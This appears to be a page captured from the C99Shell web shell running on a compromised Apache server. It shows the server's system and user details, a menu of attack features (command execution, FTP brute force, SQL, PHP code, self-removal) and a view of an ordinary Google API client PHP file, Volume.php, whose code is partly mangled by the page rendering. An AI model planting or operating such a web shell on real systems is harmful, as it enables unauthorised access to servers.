!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/google/apiclient-services/src/Baremetalsolution/   drwxr-xr-x
Free 12.92 GB of 57.97 GB (22.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Volume.php (7.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\Baremetalsolution;

class 
Volume extends \Google\Model
{
  
/**
   * @var string
   */
  
public $autoGrownSizeGib;
  
/**
   * @var bool
   */
  
public $bootVolume;
  
/**
   * @var string
   */
  
public $currentSizeGib;
  
/**
   * @var string
   */
  
public $emergencySizeGib;
  
/**
   * @var string
   */
  
public $expireTime;
  
/**
   * @var string
   */
  
public $id;
  
/**
   * @var string[]
   */
  
public $labels;
  
/**
   * @var string
   */
  
public $maxSizeGib;
  
/**
   * @var string
   */
  
public $name;
  
/**
   * @var string
   */
  
public $notes;
  
/**
   * @var string
   */
  
public $originallyRequestedSizeGib;
  
/**
   * @var string
   */
  
public $performanceTier;
  
/**
   * @var string
   */
  
public $pod;
  
/**
   * @var string
   */
  
public $protocol;
  
/**
   * @var string
   */
  
public $remainingSpaceGib;
  
/**
   * @var string
   */
  
public $requestedSizeGib;
  
/**
   * @var string
   */
  
public $snapshotAutoDeleteBehavior;
  
/**
   * @var bool
   */
  
public $snapshotEnabled;
  protected 
$snapshotReservationDetailType SnapshotReservationDetail::class;
  protected 
$snapshotReservationDetailDataType '';
  
/**
   * @var string
   */
  
public $snapshotSchedulePolicy;
  
/**
   * @var string
   */
  
public $state;
  
/**
   * @var string
   */
  
public $storageAggregatePool;
  
/**
   * @var string
   */
  
public $storageType;
  
/**
   * @var string
   */
  
public $workloadProfile;

  
/**
   * @param string
   */
  
public function setAutoGrownSizeGib($autoGrownSizeGib)
  {
    
$this->autoGrownSizeGib $autoGrownSizeGib;
  }
  
/**
   * @return string
   */
  
public function getAutoGrownSizeGib()
  {
    return 
$this->autoGrownSizeGib;
  }
  
/**
   * @param bool
   */
  
public function setBootVolume($bootVolume)
  {
    
$this->bootVolume $bootVolume;
  }
  
/**
   * @return bool
   */
  
public function getBootVolume()
  {
    return 
$this->bootVolume;
  }
  
/**
   * @param string
   */
  
public function setCurrentSizeGib($currentSizeGib)
  {
    
$this->currentSizeGib $currentSizeGib;
  }
  
/**
   * @return string
   */
  
public function getCurrentSizeGib()
  {
    return 
$this->currentSizeGib;
  }
  
/**
   * @param string
   */
  
public function setEmergencySizeGib($emergencySizeGib)
  {
    
$this->emergencySizeGib $emergencySizeGib;
  }
  
/**
   * @return string
   */
  
public function getEmergencySizeGib()
  {
    return 
$this->emergencySizeGib;
  }
  
/**
   * @param string
   */
  
public function setExpireTime($expireTime)
  {
    
$this->expireTime $expireTime;
  }
  
/**
   * @return string
   */
  
public function getExpireTime()
  {
    return 
$this->expireTime;
  }
  
/**
   * @param string
   */
  
public function setId($id)
  {
    
$this->id $id;
  }
  
/**
   * @return string
   */
  
public function getId()
  {
    return 
$this->id;
  }
  
/**
   * @param string[]
   */
  
public function setLabels($labels)
  {
    
$this->labels $labels;
  }
  
/**
   * @return string[]
   */
  
public function getLabels()
  {
    return 
$this->labels;
  }
  
/**
   * @param string
   */
  
public function setMaxSizeGib($maxSizeGib)
  {
    
$this->maxSizeGib $maxSizeGib;
  }
  
/**
   * @return string
   */
  
public function getMaxSizeGib()
  {
    return 
$this->maxSizeGib;
  }
  
/**
   * @param string
   */
  
public function setName($name)
  {
    
$this->name $name;
  }
  
/**
   * @return string
   */
  
public function getName()
  {
    return 
$this->name;
  }
  
/**
   * @param string
   */
  
public function setNotes($notes)
  {
    
$this->notes $notes;
  }
  
/**
   * @return string
   */
  
public function getNotes()
  {
    return 
$this->notes;
  }
  
/**
   * @param string
   */
  
public function setOriginallyRequestedSizeGib($originallyRequestedSizeGib)
  {
    
$this->originallyRequestedSizeGib $originallyRequestedSizeGib;
  }
  
/**
   * @return string
   */
  
public function getOriginallyRequestedSizeGib()
  {
    return 
$this->originallyRequestedSizeGib;
  }
  
/**
   * @param string
   */
  
public function setPerformanceTier($performanceTier)
  {
    
$this->performanceTier $performanceTier;
  }
  
/**
   * @return string
   */
  
public function getPerformanceTier()
  {
    return 
$this->performanceTier;
  }
  
/**
   * @param string
   */
  
public function setPod($pod)
  {
    
$this->pod $pod;
  }
  
/**
   * @return string
   */
  
public function getPod()
  {
    return 
$this->pod;
  }
  
/**
   * @param string
   */
  
public function setProtocol($protocol)
  {
    
$this->protocol $protocol;
  }
  
/**
   * @return string
   */
  
public function getProtocol()
  {
    return 
$this->protocol;
  }
  
/**
   * @param string
   */
  
public function setRemainingSpaceGib($remainingSpaceGib)
  {
    
$this->remainingSpaceGib $remainingSpaceGib;
  }
  
/**
   * @return string
   */
  
public function getRemainingSpaceGib()
  {
    return 
$this->remainingSpaceGib;
  }
  
/**
   * @param string
   */
  
public function setRequestedSizeGib($requestedSizeGib)
  {
    
$this->requestedSizeGib $requestedSizeGib;
  }
  
/**
   * @return string
   */
  
public function getRequestedSizeGib()
  {
    return 
$this->requestedSizeGib;
  }
  
/**
   * @param string
   */
  
public function setSnapshotAutoDeleteBehavior($snapshotAutoDeleteBehavior)
  {
    
$this->snapshotAutoDeleteBehavior $snapshotAutoDeleteBehavior;
  }
  
/**
   * @return string
   */
  
public function getSnapshotAutoDeleteBehavior()
  {
    return 
$this->snapshotAutoDeleteBehavior;
  }
  
/**
   * @param bool
   */
  
public function setSnapshotEnabled($snapshotEnabled)
  {
    
$this->snapshotEnabled $snapshotEnabled;
  }
  
/**
   * @return bool
   */
  
public function getSnapshotEnabled()
  {
    return 
$this->snapshotEnabled;
  }
  
/**
   * @param SnapshotReservationDetail
   */
  
public function setSnapshotReservationDetail(SnapshotReservationDetail $snapshotReservationDetail)
  {
    
$this->snapshotReservationDetail $snapshotReservationDetail;
  }
  
/**
   * @return SnapshotReservationDetail
   */
  
public function getSnapshotReservationDetail()
  {
    return 
$this->snapshotReservationDetail;
  }
  
/**
   * @param string
   */
  
public function setSnapshotSchedulePolicy($snapshotSchedulePolicy)
  {
    
$this->snapshotSchedulePolicy $snapshotSchedulePolicy;
  }
  
/**
   * @return string
   */
  
public function getSnapshotSchedulePolicy()
  {
    return 
$this->snapshotSchedulePolicy;
  }
  
/**
   * @param string
   */
  
public function setState($state)
  {
    
$this->state $state;
  }
  
/**
   * @return string
   */
  
public function getState()
  {
    return 
$this->state;
  }
  
/**
   * @param string
   */
  
public function setStorageAggregatePool($storageAggregatePool)
  {
    
$this->storageAggregatePool $storageAggregatePool;
  }
  
/**
   * @return string
   */
  
public function getStorageAggregatePool()
  {
    return 
$this->storageAggregatePool;
  }
  
/**
   * @param string
   */
  
public function setStorageType($storageType)
  {
    
$this->storageType $storageType;
  }
  
/**
   * @return string
   */
  
public function getStorageType()
  {
    return 
$this->storageType;
  }
  
/**
   * @param string
   */
  
public function setWorkloadProfile($workloadProfile)
  {
    
$this->workloadProfile $workloadProfile;
  }
  
/**
   * @return string
   */
  
public function getWorkloadProfile()
  {
    return 
$this->workloadProfile;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(Volume::class, 'Google_Service_Baremetalsolution_Volume');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0057 ]--